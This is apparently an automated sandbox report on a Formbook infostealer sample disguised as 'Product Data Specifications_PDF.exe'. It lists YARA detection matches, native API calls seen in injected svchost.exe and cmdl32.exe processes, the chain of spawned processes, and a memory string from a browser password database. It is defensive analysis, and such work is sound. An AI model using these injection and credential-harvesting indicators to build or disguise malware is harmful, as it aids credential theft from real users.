            Source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sample | Static PE information: Filename: Product Data Specifications_PDF.exe
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0042C893 NtClose,9_2_0042C893
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672B60 NtClose,LdrInitializeThunk,9_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036735C0 NtCreateMutant,LdrInitializeThunk,9_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03674340 NtSetContextThread,9_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03674650 NtSuspendThread,9_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672BE0 NtQueryValueKey,9_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672BF0 NtAllocateVirtualMemory,9_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672BA0 NtEnumerateValueKey,9_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672B80 NtQueryInformationFile,9_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672AF0 NtWriteFile,9_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672AD0 NtReadFile,9_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672AB0 NtWaitForSingleObject,9_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672F60 NtCreateProcessEx,9_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672F30 NtCreateSection,9_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672FE0 NtCreateFile,9_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672FA0 NtQuerySection,9_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672FB0 NtResumeThread,9_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672F90 NtProtectVirtualMemory,9_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672E30 NtWriteVirtualMemory,9_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672EE0 NtQueueApcThread,9_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672EA0 NtAdjustPrivilegesToken,9_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672E80 NtReadVirtualMemory,9_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672D30 NtUnmapViewOfSection,9_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672D00 NtSetInformationFile,9_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672D10 NtMapViewOfSection,9_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672DD0 NtDelayExecution,9_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672DB0 NtEnumerateKey,9_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672C60 NtCreateKey,9_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672C70 NtFreeVirtualMemory,9_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672C00 NtQueryInformationProcess,9_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672CF0 NtOpenProcess,9_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672CC0 NtQueryVirtualMemory,9_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03672CA0 NtQueryInformationToken,9_2_03672CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03673010 NtOpenDirectoryObject,9_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03673090 NtSetValueKey,9_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_036739B0 NtGetContextThread,9_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03673D70 NtOpenThread,9_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03673D10 NtOpenProcessToken,9_2_03673D10
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E34650 NtSuspendThread,LdrInitializeThunk,12_2_04E34650
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E34340 NtSetContextThread,LdrInitializeThunk,12_2_04E34340
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_04E32CA0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32C60 NtCreateKey,LdrInitializeThunk,12_2_04E32C60
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04E32C70
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_04E32DF0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32DD0 NtDelayExecution,LdrInitializeThunk,12_2_04E32DD0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_04E32D30
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32D10 NtMapViewOfSection,LdrInitializeThunk,12_2_04E32D10
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32EE0 NtQueueApcThread,LdrInitializeThunk,12_2_04E32EE0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_04E32E80
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32FE0 NtCreateFile,LdrInitializeThunk,12_2_04E32FE0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32FB0 NtResumeThread,LdrInitializeThunk,12_2_04E32FB0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32F30 NtCreateSection,LdrInitializeThunk,12_2_04E32F30
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32AF0 NtWriteFile,LdrInitializeThunk,12_2_04E32AF0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32AD0 NtReadFile,LdrInitializeThunk,12_2_04E32AD0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32BE0 NtQueryValueKey,LdrInitializeThunk,12_2_04E32BE0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04E32BF0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_04E32BA0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32B60 NtClose,LdrInitializeThunk,12_2_04E32B60
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E335C0 NtCreateMutant,LdrInitializeThunk,12_2_04E335C0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E339B0 NtGetContextThread,LdrInitializeThunk,12_2_04E339B0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32CF0 NtOpenProcess,12_2_04E32CF0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32CC0 NtQueryVirtualMemory,12_2_04E32CC0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32C00 NtQueryInformationProcess,12_2_04E32C00
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32DB0 NtEnumerateKey,12_2_04E32DB0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32D00 NtSetInformationFile,12_2_04E32D00
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32EA0 NtAdjustPrivilegesToken,12_2_04E32EA0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32E30 NtWriteVirtualMemory,12_2_04E32E30
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32FA0 NtQuerySection,12_2_04E32FA0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32F90 NtProtectVirtualMemory,12_2_04E32F90
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32F60 NtCreateProcessEx,12_2_04E32F60
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32AB0 NtWaitForSingleObject,12_2_04E32AB0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E32B80 NtQueryInformationFile,12_2_04E32B80
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E33090 NtSetValueKey,12_2_04E33090
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E33010 NtOpenDirectoryObject,12_2_04E33010
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E33D70 NtOpenThread,12_2_04E33D70
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_04E33D10 NtOpenProcessToken,12_2_04E33D10
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_02BB96E0 NtDeleteFile,12_2_02BB96E0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_02BB9790 NtClose,12_2_02BB9790
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_02BB9480 NtCreateFile,12_2_02BB9480
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_02BB95F0 NtReadFile,12_2_02BB95F0
            Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: 12_2_02BB98F0 NtAllocateVirtualMemory,12_2_02BB98F0
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,6_2_00431BE8
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00446313
            Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,6_2_004333BE
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E4739A12_2_04E4739A
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04DED34C12_2_04DED34C
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB132D12_2_04EB132D
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBFCF212_2_04EBFCF2
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E79C3212_2_04E79C32
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E1FDC012_2_04E1FDC0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB7D7312_2_04EB7D73
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E03D4012_2_04E03D40
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB1D5A12_2_04EB1D5A
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E09EB012_2_04E09EB0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBFFB112_2_04EBFFB1
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E01F9212_2_04E01F92
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBFF0912_2_04EBFF09
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E038E012_2_04E038E0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E6D80012_2_04E6D800
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E0995012_2_04E09950
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E1B95012_2_04E1B950
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E9591012_2_04E95910
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EADAC612_2_04EADAC6
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E45AA012_2_04E45AA0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E9DAAC12_2_04E9DAAC
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EA1AA312_2_04EA1AA3
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E73A6C12_2_04E73A6C
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBFA4912_2_04EBFA49
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EB7A4612_2_04EB7A46
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E75BF012_2_04E75BF0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E3DBF912_2_04E3DBF9
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04E1FB8012_2_04E1FB80
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04EBFB7612_2_04EBFB76
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA202012_2_02BA2020
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02B9CF3712_2_02B9CF37
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02B9CF4012_2_02B9CF40
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02B9B1E012_2_02B9B1E0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02B9D16012_2_02B9D160
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA570012_2_02BA5700
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA389912_2_02BA3899
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA38E012_2_02BA38E0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BA38DB12_2_02BA38DB
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_02BBBDD012_2_02BBBDD0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04C1E42312_2_04C1E423
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04C1E7BC12_2_04C1E7BC
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04C1E30612_2_04C1E306
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04C1D82812_2_04C1D828
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 12_2_04C1E94D12_2_04C1E94D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03675130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0362B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03687E54 appears 111 times
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: String function: 00445AE0 appears 65 times
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: String function: 04E6EA12 appears 86 times
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: String function: 04E35130 appears 58 times
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: String function: 04E47E54 appears 111 times
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: String function: 04DEB970 appears 277 times
Source: C:\Windows\SysWOW64\cmdl32.exe | Code function: String function: 04E7F290 appears 105 times
Source: Product Data Specifications_PDF.exe, 00000006.00000003.1378998352.000000000490D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Product Data Specifications_PDF.exe
Source: Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004763000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Product Data Specifications_PDF.exe
Source: Product Data Specifications_PDF.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@8/6
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0044AF6C GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0046CB5F OleInitialize,CLSIDFromProgID,CLSIDFromString,CoCreateInstance,CoInitializeSecurity,_wcslen,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Code function: 6_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | File created: C:\Users\user~1\AppData\Local\Temp\nonhazardousness
Source: Product Data Specifications_PDF.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cmdl32.exe, 0000000C.00000003.1973204576.0000000003208000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003228000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.00000000031F3000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1973278048.00000000031F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Product Data Specifications_PDF.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | File read: C:\Users\user\Desktop\Product Data Specifications_PDF.exe
Source: unknown | Process created: C:\Users\user\Desktop\Product Data Specifications_PDF.exe "C:\Users\user\Desktop\Product Data Specifications_PDF.exe"
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Product Data Specifications_PDF.exe"
Source: C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe | Process created: C:\Windows\SysWOW64\cmdl32.exe "C:\Windows\SysWOW64\cmdl32.exe"
Source: C:\Windows\SysWOW64\cmdl32.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: msdart.dll
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: cmpbk32.dll
Source: C:\Windows\SysWOW64\cmdl32.exe | Section loaded: cmutil.dll
